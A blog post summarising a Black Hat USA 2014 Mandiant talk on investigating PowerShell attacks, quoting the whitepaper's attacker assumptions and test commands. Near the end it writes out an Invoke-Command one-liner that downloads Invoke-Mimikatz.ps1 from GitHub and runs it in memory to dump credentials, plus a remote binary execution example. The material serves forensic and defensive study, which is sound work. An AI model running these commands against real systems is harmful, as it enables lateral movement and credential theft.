Black Hat USA 2014 Presentation: Investigating PowerShell Attacks

Black Hat USA 2014 Presentation: Investigating PowerShell Attacks

This is an excellent presentation and I highly recommend anyone who is an admin or who is responsible for AD security.

Investigating PowerShell Attacks
Ryan Kazanciyan Technical Director, Mandiant
Matt Hastings Consultant, Mandiant

Over the past two years, we’ve seen targeted attackers increasingly utilize PowerShell to conduct command-and-control in compromised Windows environments. If your organization is running Windows 7 or Server 2008 R2, you’ve got PowerShell 2.0 installed (and on Server 2012, remoting is enabled by default!). This has created a whole new playground of attack techniques for intruders that have already popped a few admin accounts (or an entire domain). Even if you’re not legitimately using PowerShell to administer your systems, you need to be aware of how attackers can enable and abuse its features.

This presentation will focus on common attack patterns performed through PowerShell – such as lateral movement, remote command execution, reconnaissance, file transfer, etc. – and the sources of evidence they leave behind. We’ll demonstrate how to collect and interpret these forensic artifacts, both on individual hosts and at scale across the enterprise. Throughout the presentation, we’ll include examples from real-world incidents and recommendations on how to limit exposure to these attacks.

• BlackHat Presentation Slides & DEFCON Slides
• PowerShell Magazine Article
• Video Link (YouTube)

From their WhitePaper:

The authors therefore based their research on the
following assumptions:

• The attacker can obtain administrator-equivalent rights on the target system – most typically, the credentials for a privileged domain account.

• The attacker can laterally access the target system over common Windows ports and protocols (e.g. SMB, NetBIOS, and / or WinRM)

• The attacker can remotely enable PowerShell remoting and the WinRM service on a remote host by means of other native-Windows commands – such as through a scheduled task (“at” command), the service control manager (“sc” command), or Windows Management Instrumentation (WMI).

• The attacker can bypass the default “Restricted” policy under which PowerShell will execute scripts.

• The attacker, given administrator privileges, could  bypass or disable a constrained remoting endpoint configured to limit the scope of PowerShell commands available to a user. (A lower-privileged attacker might also bypass such controls – Joseph Bialek and Lee Holmes have also recently blogged on techniques to break out of constrainedrunspace, if implemented with vulnerable code, and run unauthorized commands.

The authors executed the following sequence of commands during testing. These commands were chosen as representative examples of how an attacker might interact with a targeted system through PowerShell. They also make use of basic cmdlets that are likely to be used even in more complex attacks.

• Single remote cmdlet execution through Invoke-Command, such as:
Invoke-Command 192.168.17.150 {Get-ChildItem c:\}

• Single remote binary execution through Invoke-Command, such as:
Invoke-Command 192.168.17.150 {c:\malware.exe}

• Remote in-memory download and execution of PowerSploit framework script Invoke-Mimikatz.ps1, such as:
Invoke-Command 192.168.17.150
{iex((New-Object Net.WebClient).
DownloadString(‘https://raw.
githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds}

• Remote interactive PowerShell command session initiated with the syntax:
Enter-PSSession 192.168.17.150